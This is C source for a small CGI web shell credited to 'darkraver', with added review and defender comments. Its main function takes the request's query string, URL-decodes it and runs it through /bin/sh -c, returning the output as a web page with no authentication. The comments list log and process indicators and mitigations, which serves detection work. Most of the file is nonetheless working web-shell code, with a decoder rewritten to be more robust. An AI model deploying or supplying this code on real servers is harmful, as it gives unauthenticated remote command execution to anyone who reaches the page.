cmd.c
//
// cmdcgi.exe 0.1 darkraver (12/05/2005)
//
#include <stdio.h>
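/*
 * Map one hexadecimal digit to its numeric value (0-15).
 * Returns -1 for any other character, including the string terminator.
 */
static int hex_digit_value(char c) {
    if (c >= '0' && c <= '9') {
        return c - '0';
    }
    if (c >= 'a' && c <= 'f') {
        return c - 'a' + 10;
    }
    if (c >= 'A' && c <= 'F') {
        return c - 'A' + 10;
    }
    return -1;
}

/*
 * Decode a URL-encoded (query-string style) value: '+' becomes a space and
 * "%XX" becomes the byte whose hexadecimal value is XX. Every other byte is
 * copied unchanged.
 *
 * Returns a newly malloc'd, NUL-terminated string owned by the caller, or
 * NULL when uri is NULL or the allocation fails.
 *
 * Memory-safety defects of the earlier version that this one removes:
 *  - the buffer was strlen(uri) bytes, so the terminator was written one
 *    byte past the allocation whenever the input held no "%XX" escape;
 *  - sscanf("%x") stored an unsigned int through a pointer to a single char,
 *    overwriting neighbouring stack memory;
 *  - a '%' in the last position read uri[i+2], one byte past the terminator;
 *  - the malloc result was used without a NULL check.
 *
 * A '%' that is not followed by two hex digits is copied literally.
 * A decoded "%00" places a NUL byte in the output, so consumers that treat
 * the result as a C string see it end there.
 *
 * NOTE(review): this file includes only <stdio.h>; malloc and strlen are
 * used without <stdlib.h> / <string.h>.
 */
char *uri_decode(char *uri) {
    size_t len;
    size_t in;
    size_t out = 0;
    char *command;

    if (uri == NULL) {
        return NULL;
    }

    /* Decoding never lengthens the text, so len + 1 always fits. */
    len = strlen(uri);
    command = malloc(len + 1);
    if (command == NULL) {
        return NULL;
    }

    for (in = 0; in < len; in++) {
        char c = uri[in];

        if (c == '+') {
            command[out++] = ' ';
        } else if (c == '%') {
            /*
             * Short-circuit evaluation stops at the terminator, so
             * uri[in + 2] is read only when uri[in + 1] is a hex digit
             * and therefore not the end of the string.
             */
            int hi = hex_digit_value(uri[in + 1]);
            int lo = (hi >= 0) ? hex_digit_value(uri[in + 2]) : -1;

            if (hi >= 0 && lo >= 0) {
                command[out++] = (char)((hi << 4) | lo);
                in += 2;
            } else {
                command[out++] = c;
            }
        } else {
            command[out++] = c;
        }
    }

    command[out] = '\0';
    return command;
}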
/*
 * CGI entry point of a web shell: the request's query string is decoded and
 * handed to /bin/sh -c, and the shell's output becomes the HTTP response body.
 *
 * Security-relevant properties visible in this function:
 *  - No authentication or authorization check appears anywhere in the file;
 *    any client able to reach the CGI can have a command executed.
 *  - execl() replaces the CGI process image, so the shell runs with whatever
 *    privileges the web server gave that process.
 *  - The decoded query value is written into the HTML response unescaped.
 *
 * Defender notes, derived from the strings and calls below:
 *  - Process telemetry: a web-server child exec'ing "/bin/sh -c <string>".
 *  - Access logs: GET requests to a CGI executable carrying a "cmd=" query
 *    parameter (the form below submits a field named "cmd").
 *  - Response content: the literal "<b>COMMAND: " banner followed by "<pre>".
 *  - Mitigations: remove the file, and restrict which files under CGI-enabled
 *    directories are writable or executable by the web-server account.
 */
int main(int argc, char **argv) {
char *cmd;
// Emit the CGI response header and open the HTML document.
printf("Content-type: text/html\n\n");
printf("<html><body>\n");
// QUERY_STRING is set by the web server from the request URL (client-controlled).
cmd=(char *)getenv("QUERY_STRING");
if(!cmd || strlen(cmd)==0) {
// No query string: render a one-field GET form whose input is named "cmd".
printf("<hr><p><form method=\"GET\" name=\"myform\" action=\"\">");
printf("<input type=\"text\" name=\"cmd\">");
printf("<input type=\"submit\" value=\"Send\">");
printf("<br><br><hr></form>");
} else {
//printf("QUERY_STRING: %s\n", cmd);
// Skips 4 bytes, presumably the "cmd=" prefix produced by the form above.
// NOTE(review): the prefix is never compared and the length is not checked,
// so a query string shorter than 4 bytes moves the pointer past its terminator.
cmd+=4;
// uri_decode returns a heap buffer; it is never freed (the process is replaced below).
cmd=uri_decode(cmd);
// Client-supplied text is reflected into the HTML page without escaping.
printf("<hr><p><b>COMMAND: %s</b><br><br><hr><pre>\n", cmd);
// Flush buffered stdio output first: execl discards the current process image,
// including any unflushed stdout buffer.
fflush(stdout);
// Hands the client-supplied string to the shell for execution.
// NOTE(review): the variadic terminator is a bare 0 rather than (char *)NULL,
// and the execl return value (failure case) is not checked.
execl("/bin/sh", "/bin/sh", "-c", cmd, 0);
}
// NOTE(review): no return statement; the </pre>, </body> and </html> tags are never emitted.
}